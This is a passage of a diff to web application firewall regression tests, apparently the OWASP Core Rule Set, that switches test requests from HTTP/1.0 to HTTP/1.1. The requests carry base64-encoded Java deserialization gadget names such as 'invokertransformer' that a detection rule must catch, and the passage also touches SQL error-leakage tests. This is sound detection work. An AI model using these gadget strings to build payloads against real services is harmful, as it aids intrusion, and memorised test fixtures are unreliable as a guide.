@@ -4578,7 +4578,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=BpbnZva2VydHJhbnNmb3JtZXI"
         output:
           log:
@@ -4598,7 +4598,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}"
         output:
           log:
@@ -4618,7 +4618,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}"
         output:
           log:
@@ -4638,7 +4638,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5"
         output:
           log:
@@ -4658,7 +4658,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5=test"
         output:
           log:
@@ -4679,7 +4679,7 @@ tests:
             Cookie: test=cHJvdG90eXBlY2xvbmVmYWN0b3J5
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -4699,7 +4699,7 @@ tests:
             Cookie: cHJvdG90eXBlY2xvbmVmYWN0b3J5=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -4719,7 +4719,7 @@ tests:
             test: cHJvdG90eXBlY2xvbmVmYWN0b3J5
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -4738,7 +4738,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\">element_value</element></xml>"
         output:
           log:
@@ -4758,7 +4758,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">cHJvdG90eXBlY2xvbmVmYWN0b3J5</element></xml>"
         output:
           log:
@@ -4778,7 +4778,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">cHJvdG90eXBlY2xvbmVmYWN0b3J5</element></l3></l2></l1></xml>"
         output:
           log:
@@ -4798,7 +4798,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5"
         output:
           log:
@@ -4818,7 +4818,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}"
         output:
           log:
@@ -4838,7 +4838,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": \"test\"}"
         output:
           log:
@@ -4858,7 +4858,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ"
         output:
           log:
@@ -4878,7 +4878,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test"
         output:
           log:
@@ -4899,7 +4899,7 @@ tests:
             Cookie: test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -4919,7 +4919,7 @@ tests:
             Cookie: HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -4939,7 +4939,7 @@ tests:
             test: HByb3RvdHlwZWNsb25lZmFjdG9yeQ
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -4958,7 +4958,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\">element_value</element></xml>"
         output:
           log:
@@ -4978,7 +4978,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">HByb3RvdHlwZWNsb25lZmFjdG9yeQ</element></xml>"
         output:
           log:
@@ -4998,7 +4998,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">HByb3RvdHlwZWNsb25lZmFjdG9yeQ</element></l3></l2></l1></xml>"
         output:
           log:
@@ -5018,7 +5018,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ"
         output:
           log:
@@ -5038,7 +5038,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}"
         output:
           log:
@@ -5058,7 +5058,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}"
         output:
           log:
@@ -5078,7 +5078,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk"
         output:
           log:
@@ -5098,7 +5098,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test"
         output:
           log:
@@ -5119,7 +5119,7 @@ tests:
             Cookie: test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -5139,7 +5139,7 @@ tests:
             Cookie: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -5159,7 +5159,7 @@ tests:
             test: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -5178,7 +5178,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\">element_value</element></xml>"
         output:
           log:
@@ -5198,7 +5198,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk</element></xml>"
         output:
           log:
@@ -5218,7 +5218,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk</element></l3></l2></l1></xml>"
         output:
           log:
@@ -5238,7 +5238,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk"
         output:
           log:
@@ -5258,7 +5258,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}"
         output:
           log:
@@ -5278,7 +5278,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}"
         output:
           log:
@@ -5298,7 +5298,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk"
         output:
           log:
@@ -5318,7 +5318,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test"
         output:
           log:
@@ -5339,7 +5339,7 @@ tests:
             Cookie: test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -5359,7 +5359,7 @@ tests:
             Cookie: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -5379,7 +5379,7 @@ tests:
             test: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -5398,7 +5398,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\">element_value</element></xml>"
         output:
           log:
@@ -5418,7 +5418,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk</element></xml>"
         output:
           log:
@@ -5438,7 +5438,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk</element></l3></l2></l1></xml>"
         output:
           log:
@@ -5458,7 +5458,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk"
         output:
           log:
@@ -5478,7 +5478,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}"
         output:
           log:
@@ -5498,7 +5498,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}"
         output:
           log:
@@ -5518,7 +5518,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5"
         output:
           log:
@@ -5538,7 +5538,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test"
         output:
           log:
@@ -5559,7 +5559,7 @@ tests:
             Cookie: test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -5579,7 +5579,7 @@ tests:
             Cookie: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -5599,7 +5599,7 @@ tests:
             test: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -5618,7 +5618,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\">element_value</element></xml>"
         output:
           log:
@@ -5638,7 +5638,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5</element></xml>"
         output:
           log:
@@ -5658,7 +5658,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5</element></l3></l2></l1></xml>"
         output:
           log:
@@ -5678,7 +5678,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5"
         output:
           log:
@@ -5698,7 +5698,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}"
         output:
           log:
@@ -5718,7 +5718,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}"
         output:
           log:
@@ -5738,7 +5738,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ"
         output:
           log:
@@ -5758,7 +5758,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test"
         output:
           log:
@@ -5779,7 +5779,7 @@ tests:
             Cookie: test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -5799,7 +5799,7 @@ tests:
             Cookie: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -5819,7 +5819,7 @@ tests:
             test: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -5838,7 +5838,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\">element_value</element></xml>"
         output:
           log:
@@ -5858,7 +5858,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ</element></xml>"
         output:
           log:
@@ -5878,7 +5878,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ</element></l3></l2></l1></xml>"
         output:
           log:
@@ -5898,7 +5898,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ"
         output:
           log:
@@ -5918,7 +5918,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}"
         output:
           log:
@@ -5938,7 +5938,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": \"test\"}"
         output:
           log:
@@ -5958,7 +5958,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=d2hpbGVjbG9zdXJl"
         output:
           log:
@@ -5978,7 +5978,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "d2hpbGVjbG9zdXJl=test"
         output:
           log:
@@ -5999,7 +5999,7 @@ tests:
             Cookie: test=d2hpbGVjbG9zdXJl
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -6019,7 +6019,7 @@ tests:
             Cookie: d2hpbGVjbG9zdXJl=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -6039,7 +6039,7 @@ tests:
             test: d2hpbGVjbG9zdXJl
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -6058,7 +6058,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"d2hpbGVjbG9zdXJl\">element_value</element></xml>"
         output:
           log:
@@ -6078,7 +6078,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">d2hpbGVjbG9zdXJl</element></xml>"
         output:
           log:
@@ -6098,7 +6098,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">d2hpbGVjbG9zdXJl</element></l3></l2></l1></xml>"
         output:
           log:
@@ -6118,7 +6118,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=d2hpbGVjbG9zdXJl"
         output:
           log:
@@ -6138,7 +6138,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}"
         output:
           log:
@@ -6158,7 +6158,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}"
         output:
           log:
@@ -6178,7 +6178,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=HdoaWxlY2xvc3VyZQ"
         output:
           log:
@@ -6198,7 +6198,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "HdoaWxlY2xvc3VyZQ=test"
         output:
           log:
@@ -6219,7 +6219,7 @@ tests:
             Cookie: test=HdoaWxlY2xvc3VyZQ
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -6239,7 +6239,7 @@ tests:
             Cookie: HdoaWxlY2xvc3VyZQ=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -6259,7 +6259,7 @@ tests:
             test: HdoaWxlY2xvc3VyZQ
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -6278,7 +6278,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"HdoaWxlY2xvc3VyZQ\">element_value</element></xml>"
         output:
           log:
@@ -6298,7 +6298,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">HdoaWxlY2xvc3VyZQ</element></xml>"
         output:
           log:
@@ -6318,7 +6318,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">HdoaWxlY2xvc3VyZQ</element></l3></l2></l1></xml>"
         output:
           log:
@@ -6338,7 +6338,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=HdoaWxlY2xvc3VyZQ"
         output:
           log:
@@ -6358,7 +6358,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}"
         output:
           log:
@@ -6378,7 +6378,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}"
         output:
           log:
@@ -6398,7 +6398,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=B3aGlsZWNsb3N1cmU"
         output:
           log:
@@ -6418,7 +6418,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "B3aGlsZWNsb3N1cmU=test"
         output:
           log:
@@ -6439,7 +6439,7 @@ tests:
             Cookie: test=B3aGlsZWNsb3N1cmU
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -6459,7 +6459,7 @@ tests:
             Cookie: B3aGlsZWNsb3N1cmU=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -6479,7 +6479,7 @@ tests:
             test: B3aGlsZWNsb3N1cmU
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -6498,7 +6498,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"B3aGlsZWNsb3N1cmU\">element_value</element></xml>"
         output:
           log:
@@ -6518,7 +6518,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">B3aGlsZWNsb3N1cmU</element></xml>"
         output:
           log:
@@ -6538,7 +6538,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">B3aGlsZWNsb3N1cmU</element></l3></l2></l1></xml>"
         output:
           log:
@@ -6558,7 +6558,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=B3aGlsZWNsb3N1cmU"
         output:
           log:
@@ -6578,7 +6578,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}"
         output:
           log:
@@ -6598,7 +6598,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}"
         output:
           log:
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml
index cf9e40a07..e20fe685e 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml
@@ -17,7 +17,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body":"[match sql-errors.data]the used select statements have different number of columns[/match]: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression"}
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml
index 84bc18f98..7423157a0 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml
@@ -17,7 +17,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
